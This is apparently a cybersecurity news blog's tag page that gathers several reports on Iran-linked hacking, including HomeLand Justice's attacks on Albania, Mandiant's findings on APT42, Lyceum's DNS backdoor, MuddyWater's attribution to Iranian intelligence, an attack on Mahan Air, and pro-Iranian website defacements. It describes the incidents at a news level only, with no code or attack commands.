Search This Blog

Showing posts with label Iran hackers. Show all posts

Albanian President Holds Meeting with NSC Over Iran Cyber Attacks Led by HomeLand Justice

 

In the wake of the ongoing cyber attacks led by hackers group HomeLand Justice, the Albanian President Bajram Begaj recently held a meeting with the National Security Council (NSC) in the Albanian capital, Tirana on 10th October, Monday. The meeting, attended by senior government officials was conducted in order to discuss the issue of persistent cyberattacks, carried out against state infrastructure by Iran. 

The meeting was attended by Albanian Prime Minister Edi Rama, Prosecutor General Olsjan Çela, Director General of Police Muhamet Rrumbullaku, Chairman of the Security Commission Nasip Naço, and senior intelligence officials. 

The threat actors referred to as HomeLand Justice is a hacker group sponsored by the Iranian government’s advanced persistent threat (ATP) actors. The hackers attempted to paralyse public services, and delete and steal governmental data, disrupting the government’s websites and services, which created a nuisance in the state. 

Earlier this year, in July, HomeLand Justice took to social media, demonstrating the attack pattern of advertising the Albanian Government about the leaks, and posting polls asking the viewers to select the hacked information they want to be published.  

A similar attack was launched in September against the Albanian government, possibly instigated in retaliation for public attribution of the previous attacks, it severed diplomatic ties between the governments of Iran and Albania. 

Over the weekend, threat actors published the hacked data pertaining to employees of the State Police on the Telegram channel operated by Homeland Justice. The leaked data involved names, personal information and photographs, ID numbers, age, name, and photo. 

Although not much information has been provided about the meeting that lasted for two hours, Finance Minister Delina Ibrahimaj briefed about the meeting in an unrelated press conference. 

“In fact, it is the role of the president to call the national security committee on various issues. We discussed the current issues of cyber attacks. Each institution reported on the measures taken, on the level of impact and on the measures that will be taken in the future to cope with the situation”, stated Delina. 

The National Security Council was last addressed on 14th February 2022 by former president Ilir Meta in regard to Russia-Ukraine tensions.

Iranian APT42 Launched Over 30 Espionage Attacks Across 14 Nations

 

Cybersecurity firm Mandiant has attributed over 30 cyber espionage attacks against activists and dissidents to the state-backed Iranian threat group APT42 (formerly UNC788) with activity dating back to 2015, at least. 

Based on APT42’s activities, the researchers believe the hacking group operates on behalf of the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO), not to mention shares partial overlaps with another Iran-linked APT group tracked as APT35 (aka Charming Kitten, Phosphorus, Newscaster, and Ajax Security Team). 

The APT group has targeted multiple industries such as non-profits, education, governments, healthcare, legal, manufacturing, media, and pharmaceuticals spanning across 14 nations, including in Australia, Europe, the Middle East, and the U.S. 

“APT42 activity poses a threat to foreign policy officials, commentators, and journalists, particularly those in the US, the UK, and Israel, working on Iran-related projects,” reads the report published by Mandiant. "Additionally, the group’s surveillance activity highlights the real-world risk to individual targets of APT42 operations, which include Iranian dual-nationals, former government officials, and dissidents both inside Iran and those who previously left the country, often out of fear for their personal safety.” 

The Iranian hackers are primarily focused on cyber-espionage, employing highly targeted spear-phishing and social engineering methodologies to access personal and corporate email accounts, or to deploy Android malware on mobile devices. 

The APT group also has the capability of siphoning two-factor authentication codes to circumvent more secure authentication methods, and sometimes leverages this access to target employers, colleagues, and relatives of the initial victim. However, while credential theft is favored, the group has also deployed multiple custom backdoors and lightweight tools to target firms. 

Last year in September, the Iranian hackers accessed a European government email account and exploited it to send a phishing email to nearly 150 email addresses linked with individuals or entities employed by or associated with civil society, government, or intergovernmental organizations across the globe. The phishing mail embedded a Google Drive link to a malicious macro document leading to TAMECAT, a PowerShell toehold backdoor. 

Additionally, the researchers have uncovered multiple similarities in “intrusion activity clusters” between APT42 and another Iran-linked hacking group, UNC2448, which has been known in the past to scan for vulnerabilities and even deploy BitLocker ransomware. 

“While Mandiant has not observed technical overlaps between APT42 and UNC2448, the latter may also have ties to the IRGC-IO,” Mandiant explained. "We assess with moderate confidence that UNC2448 and the Revengers Telegram persona are operated by at least two Iranian front companies, Najee Technology and Afkar System, based on open-source information and operational security lapses by the threat actors.”

Iranian Attackers are Employing a New DNS Hijacking Malware to Target Organizations

 

The Iran-linked Lycaeum cyber espionage group, also known as Hexane or Spilrin, group is employing a new .NET-based DNS backdoor to target firms in the energy and telecommunication sectors.

Lyceum has previously targeted communication service vendors in the Middle East via DNS-tunneling backdoors. 

According to analytics from Zscaler ThreatLabz researchers, the backdoor is based on a DIG.net open-source tool to launch "DNS hijacking" assaults – DNS query manipulation to redirect users to malicious clones of authentic sites – implement commands, drop payloads, and exfiltrate data. 

 Employs Word doc 

The hackers target organizations via macro-laced Microsoft Documents downloaded from a domain named "news-spot[.]live," impersonating a legitimate site. The document is masked as a news report with an Iran Military affairs topic. 

When a victim downloads the file from this site, it asks to enable the macro to view the content. After enabling macros, the DnsSystem.exe backdoor is the DNS backdoor is dropped directly onto the Startup folder for establishing persistence between reboots. 

"The threat actors have customized and appended code that allows them to perform DNS queries for various records onto the custom DNS Server, parse the response of the query to execute system commands remotely, and upload/download files from the Command & Control server by leveraging the DNS protocol." - Zscaler researchers Niraj Shivtarkar and Avinash Kumar explained in a report published last week.

Initially, the malware sets up the DNS hijacking server by securing the IP address of the "cyberclub[.]one" domain and generates an MD5 based on the victim's username to serve as a unique victim ID. Additionally, the malware is well trained to upload and download arbitrary files to and from the remote server as well as implement malicious system commands remotely on the exploited server.

 Evolution of Lyceum 

The Lyceum APT group was first spotted at the beginning of August 2019 attempting to secure access to the organization’s systems via password spraying or brute-force attacks. 

Lyceum primarily focuses on cyber espionage, and this new stealthy and potent backdoor is evidence of its evolution in the field. The Iranian group is expected to continue participating in these data theft campaigns that often include multiple hacking groups from the country. 

"APT threat actors are continuously evolving their tactics and malware to successfully carry out attacks against their targets," the researchers stated. "Attackers continuously embrace new anti-analysis tricks to evade security solutions; re-packaging of malware makes the static analysis even more challenging."

U.S. Cyber Command Officially Links MuddyWater Gang to Iranian Intelligence

 

The US military's Cyber Command on Wednesday officially tied the Iranian-backed MuddyWatter hacking group to Iran's Ministry of Intelligence and Security (MOIS).

According to Cyber Command, the hacking group was first identified in 2017 and is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS), which is involved in both domestic surveillance operations and the targeting of a wide spectrum of entities in governments, academia, cryptocurrency, telecommunications, and oil sectors in the Middle East.

"MuddyWater is an Iranian threat group; previously, the industry has reported that MuddyWater has primarily targeted Middle Eastern nations, and has also targeted European and North American nations," Cyber Command said in a statement.

On Twitter, Cyber Command said the malicious group was employing a suite of malware for espionage and malicious activity. "MOIS hacker group MuddyWater is using open-source code for malware," it said. "MuddyWater and other Iranian MOIS APTs are using DNS tunneling to communicate to its C2 infrastructure; if you see this on your network, look for suspicious outbound traffic."

In partnership with the FBI, USCYBERCOM's Cyber National Mission Force (CNMF) has also shared multiple malware samples of PowGoop, a DLL loader designed to decrypt and run a PowerShell-based malware downloader. Five of the files that CYBERCOM has uploaded to VirusTotal this week aren’t identified as malicious by any of the antivirus engines in the scanning service, while six others have very low detection rates.

"If you see a combination of these tools, Iranian MOIS actor MuddyWater may be in your network. MuddyWater has been seen using a variety of techniques to maintain access to victim networks," the US military command added. "These include side-loading DLLs in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command and control functions."

Last year in November, cyber authorities across the US, UK, and Australia attributed attacks exploiting loopholes in Fortinet and Exchanges to Iranian-backed attackers. Rather than targeting a particular sector of the economy, the malicious actors were simply focused on exploiting the vulnerabilities wherever possible; following the operation, they then attempted to turn that initial access into data exfiltration, a ransomware attack, or extortion.

Iran's Mahan Airline Targeted in Cyber Attack

 

A cyber-attack against Iran's second-largest airline, Mahan Air has been thwarted, Iranian media reported on Sunday, adding that the airliner's flight schedule was not impacted by the cyber assault.

"Mahan Air's computer system has suffered a new attack. It has already been the target on several occasions due to its important position in the country's aviation industry. Our internet security team is thwarting the cyberattack," airline spokesman Amir-Hossein Zolanvari told state television. 

According to the Daily Sabah, following the attack passengers could not access the airline’s website for hours displaying an error message saying the site couldn’t be reached. Additionally, many customers of Mahan Air across Iran received strange text messages from a group called Hoosyarane-Vatan, claiming to have carried out the attack. 

“We believe the public deserves to know the truth behind this cooperation and the money wasted on IRGC activities abroad while Iranian people suffer at home,” the hacking group said in a statement on the Telegram messaging app. 

Being an Iranian airline, Mahan Air has often found itself in the middle of a political storm. The carrier has been under US sanctions since 2011 for allegedly providing support to the Quds Force and has been associated with alleged shipments of arms from Iran to Shiite groups in Syria, including the Hezbollah terror group. Alleged Israeli airstrikes in Syria have been thought to target Mahan Air weapons shipments in the past. 

“Mahan Air has transported IRGC-QF operatives, weapons, equipment, and funds abroad in support of the IRGC-QF’s regional operations, and has also moved weapons and personnel for Hezbollah,” US Treasury stated in 2019. 

Iran, last month, accused Israel and the United States of a cyberattack on its gas stations that resulted in havoc at fuel pumps nationwide. Iranian President Ebrahim Raisi blamed the hack on anti-Iranian forces seeking to sow disorder and disruption across the nation. 

Days later, Israel's internet infrastructure was targeted by the Iranian Black Shadow hacking group, including against the largest Israeli LGBTQ dating site and an insurance firm. In July, the website of Iran's transport ministry was crippled by what state media said was a "cyber disruption" that caused delays in train services.

Iranian Hackers Attacked Websites of an African Bank and US Federal Library

 

According to Iran Briefing, hackers posing as Iranians targeted the websites of the Sierra Leone Commercial African Bank and the United States Federal Depository Library Program, by posting pro-Iranian remarks and graphics. 

The website of Sierra Leone Commercial Bank was found to be "H4ck3D IRANIAN HACKER" in Google search results. 

The words "hacked by Iranian hacker, hacked by shield Iran" were written in Twitter screenshots on a drawing of former IRGC Quds Force commander Qasem Soleimani, who was killed in a US airstrike. 

According to CBC News, the library program's website was updated with a bloodied picture of US President Donald Trump being punched in the face, as well as a message is written in Farsi and English that read "martyrdom was Soleimani's... reward for years of implacable efforts," and another caption that read "this is only a small part of Iran's cyber ability!" 

A spokesman from the US Department of Homeland Security's Cybersecurity and Infrastructure Security Agency verified the incident. Though the hack has still proven to be the activity of Iranian state-sponsored actors. 

The representative stated, “We are aware the website of the Federal Depository Library Program [FDLP] was defaced with pro-Iranian, anti-US messaging”. 

“At this time, there is no confirmation that this was the action of Iranian state-sponsored actors”. 

The website has been removed from the internet and is no longer accessible. In coordination with the FDLP and other government partners, the Cybersecurity and Infrastructure Security Agency (CISA) is keeping an eye on the situation. 

According to another senior US official, the defacement was a minor event carried out by Iranian sympathizers. Former US Secretary of State Mike Pompeo indicated at the time that a cyberattack by Iran against the US could be a possible retaliation. 

It's unclear whether the hackers had a government position or had any connection to Iran. The hack occurs at a time when tensions between the US and Iran are still high following the assassination of Qasem Soleimani, the chief of Iran's Revolutionary Guards Corps Quds Force, by a US strike in Baghdad on Jan. 2. 

Iran has already threatened retaliation for the assassination, implying that US assets and interests in the Middle East, as well as US allies, may be targeted.